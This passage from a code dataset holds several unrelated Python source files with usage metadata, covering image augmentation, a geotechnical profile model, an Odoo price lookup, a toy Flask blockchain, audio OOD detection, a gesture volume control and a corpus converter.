"usage_type": "call"}, {"api_name": "os.path.join", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path", "line_number": 121, "usage_type": "attribute"}, {"api_name": "datetime.date", "line_number": 129, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 130, "usage_type": "call"}, {"api_name": "datetime.datetime.strftime", "line_number": 139, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 139, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strftime", "line_number": 140, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 140, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 145, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 162, "usage_type": "call"}, {"api_name": "os.path", "line_number": 162, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 163, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 174, "usage_type": "call"}, {"api_name": "newspaper.Article", "line_number": 199, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 243, "usage_type": "call"}, {"api_name": "datetime.datetime.strftime", "line_number": 257, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 257, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 257, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 261, "usage_type": "call"}, {"api_name": "os.path", "line_number": 261, "usage_type": "attribute"}, {"api_name": 
"os.makedirs", "line_number": 262, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 265, "usage_type": "call"}, {"api_name": "pytz.utc", "line_number": 280, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 282, "usage_type": "call"}]} +{"seq_id": "29055917916", "text": "import random\nimport torchvision.transforms as transforms\n\nfrom PIL import ImageFilter, Image, ImageOps\n\n\n\nclass GaussianBlur(object):\n \"\"\"Gaussian blur augmentation in SimCLR https://arxiv.org/abs/2002.05709\"\"\"\n\n def __init__(self, sigma=[.1, 2.]):\n self.sigma = sigma\n\n def __call__(self, x):\n sigma = random.uniform(self.sigma[0], self.sigma[1])\n x = x.filter(ImageFilter.GaussianBlur(radius=sigma))\n return x\n\n\n\nmoco_aug = transforms.Compose([\n transforms.RandomResizedCrop(224, scale=(0.2, 1.)),\n transforms.RandomApply([transforms.ColorJitter(0.4, 0.4, 0.4, 0.1)], p=0.8),\n transforms.RandomGrayscale(p=0.2),\n transforms.RandomApply([GaussianBlur([.1, 2.])], p=0.5),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n])\n\nsimclr_aug = transforms.Compose([\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.RandomApply([transforms.ColorJitter(0.8, 0.8, 0.8, 0.2)], p=0.8),\n transforms.RandomGrayscale(p=0.2),\n transforms.RandomApply([GaussianBlur([.1, 2.])], p=0.5),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n])\n\neval_aug = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225]),\n])\n", "repo_name": "mingkai-zheng/WCL", "sub_path": "data/augmentation.py", "file_name": "augmentation.py", "file_ext": "py", "file_size_in_byte": 1511, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 30, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.uniform", "line_number": 15, "usage_type": "call"}, {"api_name": "PIL.ImageFilter.GaussianBlur", "line_number": 16, "usage_type": "call"}, {"api_name": "PIL.ImageFilter", "line_number": 16, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 21, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 21, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomResizedCrop", "line_number": 22, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 22, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomApply", "line_number": 23, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 23, "usage_type": "name"}, {"api_name": "torchvision.transforms.ColorJitter", "line_number": 23, "usage_type": "call"}, {"api_name": "torchvision.transforms.RandomGrayscale", "line_number": 24, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 24, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomApply", "line_number": 25, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 25, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomHorizontalFlip", "line_number": 26, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 26, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 27, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 
27, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 28, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 28, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 31, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 31, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomResizedCrop", "line_number": 32, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 32, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomHorizontalFlip", "line_number": 33, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 33, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomApply", "line_number": 34, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 34, "usage_type": "name"}, {"api_name": "torchvision.transforms.ColorJitter", "line_number": 34, "usage_type": "call"}, {"api_name": "torchvision.transforms.RandomGrayscale", "line_number": 35, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 35, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomApply", "line_number": 36, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 36, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 37, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 37, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 38, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 38, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 41, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 41, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 42, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 42, "usage_type": "name"}, {"api_name": "torchvision.transforms.CenterCrop", "line_number": 43, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 43, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 44, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 44, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 45, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 45, "usage_type": "name"}]} +{"seq_id": "31527769676", "text": "__author__ = \"Breinbaas | Rob van Putten\"\n__copyright__ = \"Copyright 2020\"\n__credits__ = [\"Rob van Putten\"]\n__license__ = \"GPL\"\n__version__ = \"0.1.0\"\n__maintainer__ = \"Rob van Putten\"\n__email__ = \"breinbaasnl@gmail.com\"\n__status__ = \"Development\"\n\nfrom pydantic import BaseModel\nfrom typing import List\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport matplotlib.patches as patches\n\nfrom .psoilprofile import PSoilprofile\nfrom .pointrd import PointRD\nfrom ..settings import HDSR_SOIL_COLORS\n\n# same here.. should (with more time) split it in some parent / child relation because\n# we are almost copying the normal Geoprofile.. 
so not neat, but effective for now\nclass PGeoprofile(BaseModel):\n id: str = \"\" # id van het dijktraject\n name: str = \"\" # naam van het dijktraject\n points: List[PointRD] = [] # referentielijn\n soilprofiles: List[PSoilprofile] = [] # gevonden grondprofielen\n\n @property\n def x_left(self):\n if len(self.soilprofiles) > 0:\n return min([sp.x_left for sp in self.soilprofiles])\n raise ValueError(\"Trying to get xleft from an empty geoprofile\")\n\n @property\n def x_right(self):\n if len(self.soilprofiles) > 0:\n return max([sp.x_right for sp in self.soilprofiles])\n raise ValueError(\"Trying to get xright from an empty geoprofile\")\n\n @property\n def z_top(self) -> float:\n if len(self.soilprofiles) > 0:\n return max([sp.z_top for sp in self.soilprofiles])\n raise ValueError(\"Trying to get ztop from an empty geoprofile\")\n\n @property\n def z_bottom(self) -> float:\n if len(self.soilprofiles) > 0:\n return min([sp.z_bottom for sp in self.soilprofiles])\n raise ValueError(\"Trying to get zbottom from an empty geoprofile\")\n\n def get_xy_from_l_on_refline(self, l):\n for i in range(1,len(self.points)):\n p1 = self.points[i-1]\n p2 = self.points[i]\n\n if p1.chainage <= l and l <= p2.chainage:\n x = p1.x + (l - p1.chainage) / (p2.chainage - p1.chainage) * (p1.x - p2.x)\n y = p1.y + (l - p1.chainage) / (p2.chainage - p1.chainage) * (p1.y - p2.y)\n return x, y\n\n raise ValueError(f\"Could not find xy for chainage {l}; min chainage = {self.points[0].chainage}, max chainage = {self.points[-1].chainage}\")\n \n \n def get_partial_refline(self, chainage_start: int, chainage_end: int):\n result = []\n points = np.linspace(chainage_start, chainage_end, int((chainage_end - chainage_start) / 10.) + 1)\n for p in points:\n result.append(self.get_xy_from_l_on_refline(p))\n\n return result\n\n \n def to_dam_input(self, segmentid: int, shapeinput) -> int:\n pass\n \n def plot(self, filename: str) -> None:\n pass", "repo_name": "breinbaas/geoprofielen", "sub_path": "geoprofielen/objects/pgeoprofile.py", "file_name": "pgeoprofile.py", "file_ext": "py", "file_size_in_byte": 2853, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pydantic.BaseModel", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 27, "usage_type": "name"}, {"api_name": "pointrd.PointRD", "line_number": 27, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 28, "usage_type": "name"}, {"api_name": "psoilprofile.PSoilprofile", "line_number": 28, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 69, "usage_type": "call"}]} +{"seq_id": "708504241", "text": "from odoo import models, api\r\nfrom urllib.request import urlopen\r\nfrom xml.dom.minidom import parseString\r\nimport json\r\nfrom urllib.parse import urlencode\r\nfrom odoo.exceptions import Warning\r\n\r\n\r\nclass GAProductIntegration(models.Model):\r\n _inherit = 'sale.order.line'\r\n\r\n @api.multi\r\n @api.onchange('product_id')\r\n def product_uom_change(self):\r\n\r\n if self.product_id:\r\n if self.product_id.default_code:\r\n #super(GAProductIntegration, self).product_id_change()\r\n res = super(GAProductIntegration, self).product_uom_change()\r\n data = {'ItemCode': self.product_id.default_code, 'Zone': self.order_id.partner_id.zone_id.code}\r\n url = \"http://sap.stile.com.pk/api/api/demo?\"\r\n content = urlopen(url + urlencode(data)).read()\r\n self.price_unit = parseString(json.loads(str(content, 
'utf-8'))).getElementsByTagName('Price')[0].childNodes[0].data\r\n return res\r\n\r\n GAProductIntegration()\r\n\r\n", "repo_name": "MuhammadFaizan1996/abc", "sub_path": "GA_SAP_Integration/model/product.py", "file_name": "product.py", "file_ext": "py", "file_size_in_byte": 1027, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "odoo.models.Model", "line_number": 9, "usage_type": "attribute"}, {"api_name": "odoo.models", "line_number": 9, "usage_type": "name"}, {"api_name": "urllib.request.urlopen", "line_number": 22, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 22, "usage_type": "call"}, {"api_name": "xml.dom.minidom.parseString", "line_number": 23, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 23, "usage_type": "call"}, {"api_name": "odoo.api.multi", "line_number": 12, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 12, "usage_type": "name"}, {"api_name": "odoo.api.onchange", "line_number": 13, "usage_type": "call"}, {"api_name": "odoo.api", "line_number": 13, "usage_type": "name"}]} +{"seq_id": "21015265862", "text": "import time\nfrom data.utils.indicator_mapper import Indicator_Data_Map\nfrom data.current_conditions import NOAA_Current_Observation\n\n\nclass Current_Obs_Mapper(Indicator_Data_Map):\n \"\"\" Mapper for current observation from NOAA \"\"\"\n\n def __init__(self, station):\n\n self._noaa_current_obs = NOAA_Current_Observation(station)\n self.init()\n\n self[\"icon_name\"] = \"sunny\"\n self[\"icon_color\"] = \"#FFFF00\"\n self[\"line1\"] = self.temp_str\n self[\"line2\"] = lambda: time.strftime(\n \"%I:%M\", time.localtime()).lstrip(\"0\")\n self[\"line3\"] = lambda: self._noaa_current_obs[\"weather\"]\n\n def temp_str(self):\n \"\"\"\n Returns the temperature with decimal point dropped\n \"\"\"\n\n try:\n temp = \"%iF\" % int(float(self._noaa_current_obs[\"temp_f\"]))\n except:\n temp = \"\"\n\n return temp\n", "repo_name": "mattgrogan/ledmatrix", "sub_path": "ledmatrix/data/mappers/current_obs.py", "file_name": "current_obs.py", "file_ext": "py", "file_size_in_byte": 812, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "data.utils.indicator_mapper.Indicator_Data_Map", "line_number": 6, "usage_type": "name"}, {"api_name": "data.current_conditions.NOAA_Current_Observation", "line_number": 11, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 17, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "29253380165", "text": "import os\nimport random\nimport requests\n\nfrom flask import Flask, jsonify, request\n\nfrom backend.blockchain.blockchain import Blockchain\nfrom backend.pubsub import PubSub\nfrom backend.wallet.wallet import Wallet\nfrom backend.wallet.transaction import Transaction\nfrom backend.wallet.transaction_pool import TransactionPool\n\napp = Flask(__name__)\n\nblockchain = Blockchain()\nwallet = Wallet(blockchain)\ntransaction_pool = TransactionPool()\npubsub = PubSub(blockchain, transaction_pool)\n\n\n@app.route(\"/\")\ndef route_default():\n return \"Welcom to the Blockchain\"\n\n\n@app.route(\"/blockchain/\")\ndef route_blockchain():\n return jsonify(blockchain.to_json())\n\n\n@app.route(\"/blockchain/mine/\")\ndef route_blockchain_mine():\n blockchain.add_block(transaction_pool.transaction_data())\n block = blockchain.chain[-1]\n\n 
pubsub.brodcast_block(block)\n\n transaction_pool.clear_blockchain_transactions(blockchain)\n\n return jsonify(block.to_json())\n\n\n@app.route(\"/wallet/transact/\", methods=['POST'])\ndef route_wallet_transact():\n transaction_data = request.get_json()\n transaction = transaction_pool.existing_transaction(wallet.address)\n if transaction:\n transaction.update(\n wallet,\n transaction_data['recipient'],\n transaction_data['amount'],\n )\n else:\n transaction = Transaction(\n wallet,\n transaction_data['recipient'],\n transaction_data['amount'],\n )\n\n # print(f'transaction.to_json(): {transaction.to_json()}')\n pubsub.brodcast_transaction(transaction)\n\n return jsonify(transaction.to_json())\n\n\n@app.route(\"/wallet/info/\")\ndef route_wallet_info():\n return jsonify(\n {'address': wallet.address, 'balance': wallet.balance}\n )\n\n\nROOT_PORT = 8000\nPORT = ROOT_PORT\n\nif os.environ.get(\"PEER\") == \"True\":\n\n PORT = random.randint(5000, 7000)\n result = requests.get(f\"http://localhost:{ROOT_PORT}/blockchain/\")\n print(f\"Result in json: {result.json()}\")\n\n result_blockchain = Blockchain.from_json(result.json())\n try:\n blockchain.replace_chain(result_blockchain.chain)\n print(\"-- Successfully syncronized the local chain\")\n except Exception as e:\n print(f\"\\n -- Error syncronizing: {e}\")\n\napp.run(port=PORT, debug=False)\n", "repo_name": "amitgit712/python-blockchain", "sub_path": "backend/app/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 2286, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 13, "usage_type": "call"}, {"api_name": "backend.blockchain.blockchain.Blockchain", "line_number": 15, "usage_type": "call"}, {"api_name": "backend.wallet.wallet.Wallet", "line_number": 16, "usage_type": "call"}, {"api_name": "backend.wallet.transaction_pool.TransactionPool", "line_number": 17, "usage_type": "call"}, {"api_name": "backend.pubsub.PubSub", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 28, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 45, "usage_type": "name"}, {"api_name": "backend.wallet.transaction.Transaction", "line_number": 54, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 68, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 76, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 76, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 78, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 79, "usage_type": "call"}, {"api_name": "backend.blockchain.blockchain.Blockchain.from_json", "line_number": 82, "usage_type": "call"}, {"api_name": "backend.blockchain.blockchain.Blockchain", "line_number": 82, "usage_type": "name"}]} +{"seq_id": "22935573536", "text": "#!/usr/bin/env python\n#\n# Author: Daniela Duricekova \n#\n\nimport multiprocessing\n\n\nNUMS = list(range(25, 33))\n\n\ndef fib(n):\n if n <= 1:\n return 1\n else:\n return fib(n - 1) + fib(n - 2)\n\n\ndef n_fib(n, results):\n results.put((n, fib(n)))\n\n\nif __name__ == '__main__':\n results = multiprocessing.Queue()\n processes = []\n for n in NUMS:\n p = 
multiprocessing.Process(target=n_fib, args=(n, results))\n processes.append(p)\n p.start()\n\n for p in processes:\n p.join()\n\n for _ in range(len(NUMS)):\n print(results.get())\n", "repo_name": "sopticek/blog", "sub_path": "2017-05-13-concurrent-and-parallel-programming-in-python-part-1/multiprocessing_no_inheritance.py", "file_name": "multiprocessing_no_inheritance.py", "file_ext": "py", "file_size_in_byte": 613, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "multiprocessing.Queue", "line_number": 24, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "10089626488", "text": "import os\r\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\r\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\r\nimport argparse\r\nimport numpy as np\r\n# See installation guide for FAISS here: https://github.com/facebookresearch/faiss/blob/main/INSTALL.md\r\nimport faiss\r\nimport metrics\r\n\r\nparser = argparse.ArgumentParser(description=\"OOD Detection for Audio\")\r\n\r\nparser.add_argument(\"--ind_dataset\", \r\n default=\"mswc_en\", type=str,\r\n help=\"in-distribution dataset name\")\r\n\r\nparser.add_argument(\"--ood_dataset\", \r\n default=\"vocalsound\", type=str,\r\n help=\"out-of-distribution dataset name\")\r\n\r\nparser.add_argument(\"--models_dir\", \r\n default=\"./models/\", type=str,\r\n help=\"models directory path\")\r\n\r\nparser.add_argument(\"--features_dir\", \r\n default=\"./features/\", type=str, \r\n help=\"features directory path\")\r\n\r\nparser.add_argument(\"--k\", \r\n default=5, type=int, \r\n help=\"number of nearest neighbors for ood\")\r\n\r\nargs = parser.parse_args()\r\n\r\ndef run_deep_knn_ood(args):\r\n features_path = os.path.join(args.features_dir,\r\n f\"{args.ind_dataset}_yamnet\")\r\n \r\n tr_ind_feat = np.load(os.path.join(features_path, \r\n \"ind_train_features.npy\"))\r\n ts_ind_feat = np.load(os.path.join(features_path, \r\n \"ind_test_features.npy\"))\r\n ts_ood_feat = np.load(os.path.join(features_path, \r\n f\"{args.ood_dataset}_ood_test_features.npy\")) \r\n\r\n normalizer = lambda x: x / (np.linalg.norm(x, \r\n ord=2, axis=-1, keepdims=True) + 1e-10)\r\n tr_ind_feat = normalizer(tr_ind_feat) \r\n ts_ind_feat = normalizer(ts_ind_feat)\r\n ts_ood_feat = normalizer(ts_ood_feat)\r\n\r\n index = faiss.IndexFlatL2(tr_ind_feat.shape[1])\r\n index.add(tr_ind_feat)\r\n ind_D, _ = index.search(ts_ind_feat, args.k)\r\n ind_scores = -ind_D[:,-1]\r\n ood_D, _ = index.search(ts_ood_feat, args.k)\r\n ood_scores = -ood_D[:,-1]\r\n\r\n results = metrics.get_measures(\r\n ind_scores, ood_scores, \r\n recall_level = 0.95)\r\n fpr95 = results[\"FPR\"]\r\n auroc = results[\"AUROC\"]\r\n print(f\"FPR95: {fpr95} | AUROC: {auroc}\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n run_deep_knn_ood(args)", "repo_name": "Zaharah/ood_audio", "sub_path": "run_ood.py", "file_name": "run_ood.py", "file_ext": "py", "file_size_in_byte": 2123, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 2, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 3, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": 
"numpy.load", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.load", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.load", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 45, "usage_type": "attribute"}, {"api_name": "faiss.IndexFlatL2", "line_number": 51, "usage_type": "call"}, {"api_name": "metrics.get_measures", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "71664090729", "text": "import cv2\nimport mediapipe as mp\nimport time\nimport numpy as np\nimport hand_tracker as ht\n\n\nfrom ctypes import cast, POINTER\nfrom comtypes import CLSCTX_ALL\nfrom pycaw.pycaw import AudioUtilities, IAudioEndpointVolume\ndevices = AudioUtilities.GetSpeakers()\ninterface = devices.Activate(\n IAudioEndpointVolume._iid_, CLSCTX_ALL, None)\nvolume = cast(interface, POINTER(IAudioEndpointVolume))\n\nvolume.GetVolumeRange()\nvolRnge = volume.GetVolumeRange()\nmaxvol =volRnge[1]\nminvol = volRnge[0]\n\ncap = cv2.VideoCapture(0)\nprint(minvol)\nptime = 0\nvolbar = -65.25\ndetector = ht.hand_detector(detection_confidence=0.75)\nwhile True:\n success, img = cap.read()\n img = cv2.flip(img,1)\n ctime = time.time()\n fps = 1/(ctime - ptime)\n ptime = ctime\n cv2.putText(img,f\"FPS : {int(fps)}\",(10,80),cv2.FONT_HERSHEY_COMPLEX,1,(0,0,0),2)\n detector.hand_detection(img)\n lmlis = detector.findposition(img,draw = False)\n if len(lmlis) != 0:\n\n x , y = lmlis[4][1] , lmlis[4][2]\n x1 , y1 = lmlis[8][1], lmlis[8][2]\n cx, cy = (x+x1)//2,(y+y1)//2\n length = np.hypot(x1 - x,y1-y)\n vol = np.interp(length,[30,110],[minvol,maxvol])\n volbar = np.interp(vol,[minvol,maxvol],[400,150])\n volper = np.interp(vol,[minvol,maxvol],[0,100])\n volume.SetMasterVolumeLevel(vol, None)\n\n cv2.circle(img,(x , y),8,(0,255,0),-1)\n cv2.circle(img,(x1 , y1),8,(0,255,0),-1)\n cv2.circle(img,(cx , cy),8,(0,255,0),-1)\n \n cv2.line(img,(x,y),(x1,y1),(0,255,0),2)\n cv2.rectangle(img,(150,150),(85,400),(0,125,0))\n cv2.rectangle(img,(150,int(volbar)),(85,400),(0,125,0),-1)\n cv2.putText(img,f\"{int(volper)}%\",(30,150),cv2.FONT_HERSHEY_COMPLEX,0.5,(0,0,255),1)\n\n if length < 35:\n cv2.circle(img,(cx , cy),8,(0,0,255),-1)\n\n \n\n\n\n\n\n\n\n\n cv2.imshow(\"Image\",img)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n \n\n ", "repo_name": "Joelthomas62384/ai-computer-vision", "sub_path": "gesture_volume.py", "file_name": "gesture_volume.py", "file_ext": "py", "file_size_in_byte": 1937, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pycaw.pycaw.AudioUtilities.GetSpeakers", "line_number": 11, "usage_type": "call"}, {"api_name": "pycaw.pycaw.AudioUtilities", "line_number": 11, "usage_type": "name"}, {"api_name": "comtypes.CLSCTX_ALL", "line_number": 13, "usage_type": "argument"}, {"api_name": "pycaw.pycaw.IAudioEndpointVolume._iid_", "line_number": 13, "usage_type": "attribute"}, {"api_name": "pycaw.pycaw.IAudioEndpointVolume", "line_number": 13, "usage_type": "name"}, {"api_name": 
"ctypes.cast", "line_number": 14, "usage_type": "call"}, {"api_name": "ctypes.POINTER", "line_number": 14, "usage_type": "call"}, {"api_name": "pycaw.pycaw.IAudioEndpointVolume", "line_number": 14, "usage_type": "argument"}, {"api_name": "cv2.VideoCapture", "line_number": 21, "usage_type": "call"}, {"api_name": "hand_tracker.hand_detector", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.flip", "line_number": 28, "usage_type": "call"}, {"api_name": "time.time", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.hypot", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 46, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 47, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 51, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 52, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 53, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 53, "usage_type": "attribute"}, {"api_name": "cv2.circle", "line_number": 56, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 67, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 68, "usage_type": "call"}]} +{"seq_id": "41521044463", "text": "import requests\nimport sys\ndef test(url_test):\n payload={'page':'1','count':'2'}\n urltest=url_test\n req=requests.post(urltest,data=payload, verify=False)\n print(req.url)\n print(type(req.text))\n\n print(type(req.json()))\n\n print(req.headers)\n\nurlname=sys.argv[1]\n\ntest(urlname)\n# test_url=\"https://api.github.com/repos/clairyin/homework/contents\"\n# win_url=\"J:/xew1.txt\"\n# with open(win_url, 'rb') as f:\n# print(f.readlines())\n# def get_git():\n#\n# req=requests.get(test_url)\n# #print(req.text)\n# print(req.json())\n#\n# file = open(win_url, 'rb')\n# files = {'file': file}\n# requests.post(test_url,)\n# get_git()", "repo_name": "clairyin/homework", "sub_path": "yaoxuechuan/homework01.py", "file_name": "homework01.py", "file_ext": "py", "file_size_in_byte": 658, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.post", "line_number": 6, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 14, "usage_type": "attribute"}]} +{"seq_id": "18754616760", "text": "#!/opt/python-2.7/bin/python2.7\n#\n# script can be run without invoking python because of shebang\n# will be run with correct version on Patas\n#\n# Code last updated on 5/26/2014 by Claire Jaja\n#\n# This script will convert documents from the AQUAINT2 format\n# to the AQUAINT format.\n\nimport sys\nfrom bs4 import BeautifulSoup\nfrom os import listdir, path, makedirs\n\ndef main():\n # argument is folder to put converted corpus\n converted_data = sys.argv[1]\n AQUAINT2 = \"/corpora/LDC/LDC08T25/data/\"\n\n # for every folder in AQUAINT2/data\n for folder in listdir(AQUAINT2):\n sys.stderr.write(\"Folder: \"+folder+\"\\n\")\n # create same folder in converted_data folder\n 
new_folder = path.join(converted_data,folder)\n if not path.exists(new_folder):\n makedirs(new_folder)\n # for every .xml file in that folder\n for file in [ x for x in listdir(path.join(AQUAINT2,folder)) if x.endswith(\".xml\") ]:\n sys.stderr.write(\"File: \"+file+\"\\n\")\n # create file with same name in newly created folder\n new_file = open(path.join(new_folder,file),'w')\n # parse xml with beautiful soup\n xml = open(path.join(AQUAINT2,folder,file),'r')\n soup = BeautifulSoup(xml)\n # gather doc ID, headline, and text\n docs = soup.find_all(\"doc\")\n doc_ids = []\n headlines = []\n text = []\n for doc in docs:\n doc_ids.append(doc['id'])\n if doc.headline:\n headlines.append(doc.headline.get_text())\n else:\n headlines.append(\"None\")\n text.append(doc.text)\n xml.close()\n # print out doc ID, headline, and text to newly created file\n for i in range(len(doc_ids)):\n new_file.write(\"\\n\")\n new_file.write(\" %s \\n\" % doc_ids[i])\n new_file.write(\"\\n\")\n if headlines[i]:\n new_file.write(\" %s \\n\" % headlines[i].encode('utf8'))\n new_file.write(\" %s \\n\" % text[i].encode('utf8'))\n 